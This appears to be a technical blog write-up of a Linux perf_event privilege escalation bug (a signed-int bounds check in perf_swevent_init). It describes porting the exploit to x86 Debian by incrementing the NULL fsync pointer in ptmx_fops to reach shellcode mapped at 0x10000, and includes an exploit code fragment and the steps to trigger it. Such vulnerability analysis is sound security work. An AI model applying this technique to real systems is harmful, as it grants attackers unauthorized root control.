TL;DR: (perf_ptmx.c)

Last week a link to a Linux local privilege escalation exploit was posted on HN. It affects all Linux versions between 2.6.37 and 3.8.9 compiled with PERF_EVENTS enabled. Some distros backported the bug to older kernel versions too; I tested CentOS 2.6.32-358.el6.x86_64 and found it vulnerable. The security issue is located in kernel/events/core.c, and it was introduced in a commit which added the functions perf_swevent_init and sw_perf_event_destroy.

The problem is that the value event->attr.config, which is stored in struct perf_event_attr as a u64, is checked for validity after being cast to a signed int. The check is done with:

if (event_id > PERF_COUNT_SW_MAX)
  return -ENOENT;

This means that any value of event->attr.config whose lower 4 bytes form a negative value will pass the check and will later be used as an index into the array perf_swevent_enabled. Knowing the base address of the array, it is possible (with some limitations) to increment/decrement arbitrary memory locations in kernel space. The vulnerability was fixed by simply changing the type of event_id to u64.
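The effect of the signed comparison can be reproduced in plain userspace C. The following is a minimal sketch, not kernel code: SW_MAX_ASSUMED is a stand-in for PERF_COUNT_SW_MAX (its real value depends on the kernel version), and the two function names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for PERF_COUNT_SW_MAX; the real value depends on the kernel version. */
#define SW_MAX_ASSUMED 9

/* Vulnerable shape: the 64-bit config is narrowed to a signed 32-bit value
 * before the upper-bound check, and there is no lower-bound check. */
int passes_signed_check(uint64_t config)
{
    uint32_t low = (uint32_t)config;   /* keep only the lower 4 bytes */
    int32_t event_id;
    memcpy(&event_id, &low, sizeof event_id);  /* reinterpret as signed */
    return !(event_id > SW_MAX_ASSUMED);
}

/* Fixed shape: the comparison is done on the full unsigned value. */
int passes_unsigned_check(uint64_t config)
{
    return !(config > SW_MAX_ASSUMED);
}

/* A few sanity checks on both variants. */
void signed_check_demo(void)
{
    assert(passes_signed_check(3));               /* legitimate id */
    assert(!passes_signed_check(100));            /* too large, rejected */
    assert(passes_signed_check(0xFFFFFFFFull));   /* -1 as int: accepted */
    assert(!passes_unsigned_check(0xFFFFFFFFull));/* rejected once unsigned */
}
```

Calling signed_check_demo() from a main function runs the checks; the interesting case is 0xFFFFFFFF, which is accepted by the signed variant and rejected by the unsigned one.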

Full credit to the original author for releasing the exploit (linked above). The original exploit specifically targets the x86_64 architecture, and I’ve now ported it to x86 Debian. The original version worked by incrementing base_hi, the highest 4 bytes of the handler address in the x86_64 IDT entry of interrupt 4, from 0xffffffff to 0x00000000, then mapping the corresponding memory region in userspace and filling it with shellcode that raises the privileges of the running process.

struct _idt_entry_64 {
  unsigned short base_lo;
  unsigned short sel;
  unsigned char unused;
  unsigned char flags;
  unsigned short base_mi;
  unsigned int base_hi;
  unsigned int zero;
} __attribute__((packed));

struct _idt_entry {
  unsigned short base_lo;
  unsigned short sel;
  unsigned char unused;
  unsigned char flags;
  unsigned short base_hi;
} __attribute__((packed));

Since the x86 IDT entry is laid out differently from the x86_64 one, this approach can’t be used. On Debian perf_swevent_enabled is an array of 4-byte structs, so targeting the IDT makes no sense. Even if we can increment any memory location multiple times (see the next paragraph for how), the IDT is aligned in memory and the granularity of the pointer we can manipulate is 4 bytes, so base_hi (of any interrupt) can only be reached through the 4-byte word that also contains flags. Increasing base_hi by just 1 would therefore require roughly 64k increments.
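The granularity argument can be checked with a small userspace model of the 32-bit entry. This is only a sketch under stated assumptions: it assumes a little-endian machine (as x86 is), the struct and function names are hypothetical, and adding n to the word stands in for n single increments.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same layout as struct _idt_entry above, with fixed-width types. */
struct idt_entry_32 {
    uint16_t base_lo;
    uint16_t sel;
    uint8_t  unused;
    uint8_t  flags;
    uint16_t base_hi;
} __attribute__((packed));

/* Model n increments of the 4-byte-aligned word at offset 4, which holds
 * unused, flags and base_hi together. Assumes little-endian byte order. */
struct idt_entry_32 add_to_word_at_offset_4(struct idt_entry_32 e, uint32_t n)
{
    uint32_t word;
    memcpy(&word, (unsigned char *)&e + 4, sizeof word);
    word += n;  /* same result as n separate +1 operations */
    memcpy((unsigned char *)&e + 4, &word, sizeof word);
    return e;
}
```

In this model a single increment only changes the unused byte, and it takes 0x10000 increments for the carry to raise base_hi by exactly 1 while leaving unused and flags at their original values.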

An idea from /u/spender is to call perf_event_open multiple times while keeping the file descriptors open, which avoids the destroy callback that would revert the change made in the init function. In this way it is possible to increment a value in kernel space multiple times. The drawback is that the process hits the maximum number of open file descriptors very quickly, so some forking is required. I browsed the kernel source a bit to find a function pointer initialized to zero that was not stored in read-only memory, and I chose to leverage drivers/tty/pty.c, the driver for ptmx devices. It is enabled in the default Debian kernel and has a struct file_operations ptmx_fops, which has some NULL pointers and, more importantly, is not in read-only memory.

/* 56 is offset of fsync in struct file_operations */
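/* ptmx_fops and perf_table hold the resolved addresses of the two symbols */
int target = ptmx_fops + 56;
/* negative index, in units of 4-byte array elements */
int payload = -((perf_table - target)/4);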

struct perf_event_attr event_attr;
event_attr.config = payload;
/* many many times */
syscall(__NR_perf_event_open, &event_attr, 0, -1, -1, 0);
int ptmx = open("/dev/ptmx", O_RDWR);

The exploit resolves a few symbol names, maps some memory at 0x10000, right after vm.mmap_min_addr, and fills it with privilege escalation code, then computes the offset of the fsync pointer for the pseudo terminal device relative to perf_swevent_enabled. The syscall perf_event_open is called exactly 0x10000 times, spread among multiple processes, so that the NULL fsync pointer ends up holding the address 0x10000. The shellcode is then executed by opening /dev/ptmx and calling fsync on it. When the processes terminate or close the fds returned by the syscall, cleanup is done automatically by sw_perf_event_destroy.
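The arithmetic in this paragraph can be sketched in isolation. The helpers below are hypothetical and only do the bookkeeping: they assume 4-byte array elements (as on the Debian kernel described above), and any addresses or per-process descriptor budgets passed to them are made-up inputs, not values from a real system.

```c
#include <assert.h>
#include <stdint.h>

/* Index (in 4-byte elements) that makes array_base[index] alias target.
 * The result is negative when the target lies below the array. */
int64_t index_for_target(uint32_t array_base, uint32_t target)
{
    return ((int64_t)target - (int64_t)array_base) / 4;
}

/* Address reached by indexing a 4-byte-element array at array_base. */
uint32_t address_of_element(uint32_t array_base, int64_t index)
{
    return (uint32_t)((int64_t)array_base + index * 4);
}

/* Number of worker processes needed when each one can hold at most
 * fds_per_worker descriptors open at the same time (rounded up). */
uint32_t workers_needed(uint32_t total_increments, uint32_t fds_per_worker)
{
    assert(fds_per_worker > 0);
    return (total_increments + fds_per_worker - 1) / fds_per_worker;
}
```

For example, with a made-up array base of 0xc1500000 and a made-up target of 0xc1400038, index_for_target returns -262130, and address_of_element maps that index back to the target. With an assumed budget of 1000 descriptors per process, workers_needed(0x10000, 1000) gives 66 processes.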

Source code: compile and run with gcc perf_ptmx.c && ./a.out.

